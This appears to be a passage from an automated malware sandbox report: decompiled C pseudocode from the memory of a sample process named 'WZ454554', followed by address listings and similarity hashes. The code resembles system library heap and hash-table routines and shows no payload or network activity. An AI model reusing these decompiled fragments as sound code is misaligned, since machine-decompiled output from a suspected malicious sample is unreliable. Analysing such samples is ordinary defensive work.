														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00AFF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00AFF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00AFFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00AFFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00AFF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00AFF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = L00B84CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00B0D130(_t427, _t494, _t511);
				}
			}










































































                            0x00b85ba5
                            0x00b85baa
                            0x00b85baf
                            0x00b85bb4
                            0x00b85bb6
                            0x00b85bbc
                            0x00b85bbe
                            0x00b85bc4
                            0x00b85bcd
                            0x00b85bd3
                            0x00b85bd6
                            0x00b85bdc
                            0x00b85be0
                            0x00b85be3
                            0x00b85beb
                            0x00b85bf2
                            0x00b85bf8
                            0x00b85bfe
                            0x00b85c04
                            0x00b85c0e
                            0x00b85c18
                            0x00b85c1f
                            0x00b85c25
                            0x00b85c2a
                            0x00b85c2c
                            0x00b85c32
                            0x00b85c3a
                            0x00b85c3f
                            0x00b85c42
                            0x00b85c48
                            0x00b85c5b
                            0x00b85c5b
                            0x00b85c2c
                            0x00b85cb7
                            0x00b85cb9
                            0x00b85cbf
                            0x00b85cc2
                            0x00b85cca
                            0x00b85ccb
                            0x00b85ccb
                            0x00b85cd1
                            0x00b85cd7
                            0x00b85cda
                            0x00b85ce1
                            0x00b85ce4
                            0x00b85ce7
                            0x00b85ced
                            0x00b85cf3
                            0x00b85cf9
                            0x00b85cff
                            0x00b85d08
                            0x00b85d0a
                            0x00b85d0e
                            0x00b85d10
                            0x00000000
                            0x00000000
                            0x00b85d16
                            0x00b85d1a
                            0x00000000
                            0x00000000
                            0x00b85d20
                            0x00b85d22
                            0x00b85d25
                            0x00b85d2f
                            0x00b85d2f
                            0x00b85d33
                            0x00b85d3d
                            0x00b85d49
                            0x00b85d4b
                            0x00000000
                            0x00000000
                            0x00b85d5a
                            0x00b85d5d
                            0x00b85d60
                            0x00000000
                            0x00000000
                            0x00b85d66
                            0x00b85d69
                            0x00000000
                            0x00000000
                            0x00b85d6f
                            0x00b85d6f
                            0x00b85d73
                            0x00b85d79
                            0x00b85d7f
                            0x00b85d86
                            0x00b85d95
                            0x00b85d98
                            0x00b85dba
                            0x00b85dcb
                            0x00b85dce
                            0x00b85dd3
                            0x00b85dd6
                            0x00b85dd8
                            0x00b85de6
                            0x00b85dec
                            0x00b85dee
                            0x00b85df1
                            0x00b85df3
                            0x00b8635a
                            0x00b8635a
                            0x00000000
                            0x00b8635a
                            0x00b85dfe
                            0x00b85e02
                            0x00b85e05
                            0x00b85e07
                            0x00b85e10
                            0x00b85e13
                            0x00b85e1b
                            0x00b85e1c
                            0x00b85e21
                            0x00b85e22
                            0x00b85e23
                            0x00b85e25
                            0x00b85e2a
                            0x00b85e2c
                            0x00b85e2e
                            0x00b85e36
                            0x00b85e39
                            0x00b85e42
                            0x00b85e47
                            0x00b85e4d
                            0x00b85e54
                            0x00b85e54
                            0x00b85e54
                            0x00b85e2e
                            0x00b85e5c
                            0x00b85e5f
                            0x00b85e62
                            0x00b85e64
                            0x00b85e6b
                            0x00b85e70
                            0x00b85e7a
                            0x00b85e7a
                            0x00b85e7a
                            0x00b85e6b
                            0x00b85e7e
                            0x00b85e7f
                            0x00b85e7f
                            0x00b85e81
                            0x00b85e87
                            0x00b85e8b
                            0x00b85e8c
                            0x00b85e8c
                            0x00b85e8c
                            0x00b85e9a
                            0x00b85e9c
                            0x00b85ea2
                            0x00b85ea6
                            0x00b85f50
                            0x00b85f50
                            0x00b85f57
                            0x00b85f66
                            0x00b85f66
                            0x00b85f66
                            0x00b85f68
                            0x00b85f6a
                            0x00b863d0
                            0x00000000
                            0x00b85f70
                            0x00b85f70
                            0x00b85f91
                            0x00b85f9c
                            0x00b85f9e
                            0x00b85fa4
                            0x00b85fa6
                            0x00b8638c
                            0x00b86392
                            0x00b863a1
                            0x00b863a7
                            0x00b863af
                            0x00b863af
                            0x00b863bd
                            0x00b863d8
                            0x00000000
                            0x00b863d8
                            0x00b85fac
                            0x00b85fb2
                            0x00b85fb4
                            0x00b85fbd
                            0x00b85fc6
                            0x00b85fce
                            0x00b85fd4
                            0x00b85fdc
                            0x00b85fec
                            0x00b85fed
                            0x00b85fee
                            0x00b85fef
                            0x00b85ff9
                            0x00b85ffa
                            0x00b85ffb
                            0x00b85ffc
                            0x00b86000
                            0x00b86004
                            0x00b86012
                            0x00b86012
                            0x00b86018
                            0x00b86019
                            0x00b8601a
                            0x00b8601b
                            0x00b8601c
                            0x00b86020
                            0x00b86059
                            0x00b8605c
                            0x00b86061
                            0x00b86061
                            0x00b86022
                            0x00b86022
                            0x00b86022
                            0x00b86025
                            0x00b8602a
                            0x00b8602b
                            0x00b86031
                            0x00b86037
                            0x00b86038
                            0x00b8603e
                            0x00b86048
                            0x00b86049
                            0x00b8604a
                            0x00b8604b
                            0x00b8604c
                            0x00b8604d
                            0x00b86053
                            0x00b86054
                            0x00b86054
                            0x00b86062
                            0x00b86065
                            0x00b86067
                            0x00b8606a
                            0x00b86070
                            0x00b86075
                            0x00b86076
                            0x00b86081
                            0x00b86087
                            0x00b86095
                            0x00b86099
                            0x00b8609e
                            0x00b860a4
                            0x00b860ae
                            0x00b860b0
                            0x00b860b3
                            0x00b860b6
                            0x00b860b8
                            0x00b860ba
                            0x00b860ba
                            0x00b860ba
                            0x00b860ba
                            0x00b860be
                            0x00b860c0
                            0x00b860c5
                            0x00b860c5
                            0x00b860c5
                            0x00b860c6
                            0x00b860cd
                            0x00b86114
                            0x00b860cf
                            0x00b860cf
                            0x00b860d4
                            0x00b860d5
                            0x00b860da
                            0x00b860db
                            0x00b860e1
                            0x00b860e2
                            0x00b860e8
                            0x00b860f8
                            0x00b860fd
                            0x00b860fe
                            0x00b86102
                            0x00b86104
                            0x00b86107
                            0x00b86109
                            0x00b8610b
                            0x00b8610b
                            0x00b8610b
                            0x00b8610b
                            0x00b8610f
                            0x00b8610f
                            0x00b86117
                            0x00b8611a
                            0x00b8611f
                            0x00b86125
                            0x00b86134
                            0x00b86139
                            0x00b8613f
                            0x00b86146
                            0x00b86148
                            0x00b8614b
                            0x00b8614d
                            0x00b8614f
                            0x00b8614f
                            0x00b8614f
                            0x00b8614f
                            0x00b86153
                            0x00b86159
                            0x00b86159
                            0x00b8615c
                            0x00b86163
                            0x00b86169
                            0x00b8616c
                            0x00b86172
                            0x00b86181
                            0x00b86186
                            0x00b86187
                            0x00b8618b
                            0x00b86191
                            0x00b86195
                            0x00b861a3
                            0x00b861bb
                            0x00b861c0
                            0x00b861c3
                            0x00b861cc
                            0x00b861d0
                            0x00b861dc
                            0x00b861de
                            0x00b861e1
                            0x00b861e4
                            0x00b861e6
                            0x00b861e8
                            0x00b861e8
                            0x00b861e8
                            0x00b861e8
                            0x00b861e6
                            0x00b861ec
                            0x00b861f3
                            0x00b86203
                            0x00b86209
                            0x00b8620a
                            0x00b86216
                            0x00b8621d
                            0x00b86227
                            0x00b86241
                            0x00b86246
                            0x00b8624c
                            0x00b86257
                            0x00b86259
                            0x00b8625c
                            0x00b8625e
                            0x00b86260
                            0x00b86260
                            0x00b86260
                            0x00b86260
                            0x00b8625e
                            0x00b86264
                            0x00b86267
                            0x00b86269
                            0x00b86315
                            0x00b86315
                            0x00b8631b
                            0x00b8631e
                            0x00b86324
                            0x00b86327
                            0x00b8632f
                            0x00b86330
                            0x00b86333
                            0x00b8633a
                            0x00b8633c
                            0x00b86335
                            0x00b86335
                            0x00b86335
                            0x00b8633f
                            0x00b86342
                            0x00b8634c
                            0x00b86352
                            0x00b86355
                            0x00b86355
                            0x00b86359
                            0x00000000
                            0x00b8626f
                            0x00b86275
                            0x00b86275
                            0x00b86278
                            0x00b8627e
                            0x00b8627e
                            0x00b86281
                            0x00b86287
                            0x00b8628d
                            0x00b86298
                            0x00b8629c
                            0x00b862a2
                            0x00b8629e
                            0x00b8629e
                            0x00b8629e
                            0x00b862a7
                            0x00b862a7
                            0x00b862aa
                            0x00b862b0
                            0x00b862f0
                            0x00b862f0
                            0x00b862f2
                            0x00b862f8
                            0x00b862fd
                            0x00b862b2
                            0x00b862b2
                            0x00b862b2
                            0x00b862b5
                            0x00b862dd
                            0x00b862e2
                            0x00b862e5
                            0x00b862b7
                            0x00b862b8
                            0x00b862bb
                            0x00b862bd
                            0x00b862c0
                            0x00b862c4
                            0x00b862cd
                            0x00b862cd
                            0x00b862c0
                            0x00b862bb
                            0x00b862b5
                            0x00b86302
                            0x00b86303
                            0x00b86305
                            0x00b86305
                            0x00b86305
                            0x00b8630c
                            0x00b8630c
                            0x00000000
                            0x00b8627e
                            0x00b86269
                            0x00b85eac
                            0x00b85ebb
                            0x00b85ebe
                            0x00b85ecb
                            0x00b85ecb
                            0x00b85ece
                            0x00b85ece
                            0x00b85ed4
                            0x00b85ed7
                            0x00b85ed9
                            0x00b85edb
                            0x00b85edb
                            0x00b85ee1
                            0x00b85ee1
                            0x00b85ee3
                            0x00b85f20
                            0x00b85f20
                            0x00b85ee5
                            0x00b85ee5
                            0x00b85ee5
                            0x00b85ee8
                            0x00b85f11
                            0x00b85f18
                            0x00b85eea
                            0x00b85eea
                            0x00b85eed
                            0x00b85ef2
                            0x00b85ef8
                            0x00b85efb
                            0x00b85f0a
                            0x00b85f0a
                            0x00b85eed
                            0x00b85ee8
                            0x00b85f22
                            0x00b85f28
                            0x00000000
                            0x00000000
                            0x00b85f30
                            0x00b85f31
                            0x00b85f37
                            0x00b85f3a
                            0x00b85f3d
                            0x00b85f44
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b85f46
                            0x00b85f48
                            0x00b85f4d
                            0x00000000
                            0x00b85f4d
                            0x00b85dda
                            0x00b85ddf
                            0x00000000
                            0x00b85ddf
                            0x00b85dd8
                            0x00b85da7
                            0x00b85da9
                            0x00b85dac
                            0x00b85dae
                            0x00000000
                            0x00b85db4
                            0x00b85db4
                            0x00000000
                            0x00b85db4
                            0x00b85dae
                            0x00b85d88
                            0x00b85d8d
                            0x00b86363
                            0x00b86369
                            0x00b8636a
                            0x00b86370
                            0x00b86372
                            0x00b8637a
                            0x00b8637b
                            0x00b8637d
                            0x00000000
                            0x00000000
                            0x00b8637f
                            0x00b86385
                            0x00000000
                            0x00b86385
                            0x00b85d38
                            0x00b85d3b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b85d3b
                            0x00b85d27
                            0x00b85d29
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b86360
                            0x00000000
                            0x00b86360
                            0x00b85c10
                            0x00b85c10
                            0x00b863da
                            0x00b863e5
                            0x00b863e5

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 983c6407d01628e8f650c0db60ef3fc1d87da5cb3285825eac35f3b35501b4fe
                            • Instruction ID: 5df2e2536ae03d5939b79b8513e8d367a1e8c747fbe626175f2870c491b86477
                            • Opcode Fuzzy Hash: 983c6407d01628e8f650c0db60ef3fc1d87da5cb3285825eac35f3b35501b4fe
                            • Instruction Fuzzy Hash: DC424871900629CFDB24DF68C881BA9B7F1FF49304F1481EAE94DAB252E7349A85CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B8E824, Relevance: .5, Instructions: 493COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E00B8E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0xbad360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L00ADFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E00ADFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0xbab1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E00AD2280(E00AFF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														L00ACFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0xbab1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return L00AFB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E00AEF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0xbab1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0xbab1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = L00B8E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(L00B8E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(L00B8E7A8(_t38) == 0) {
									_t406 = 0;
								}
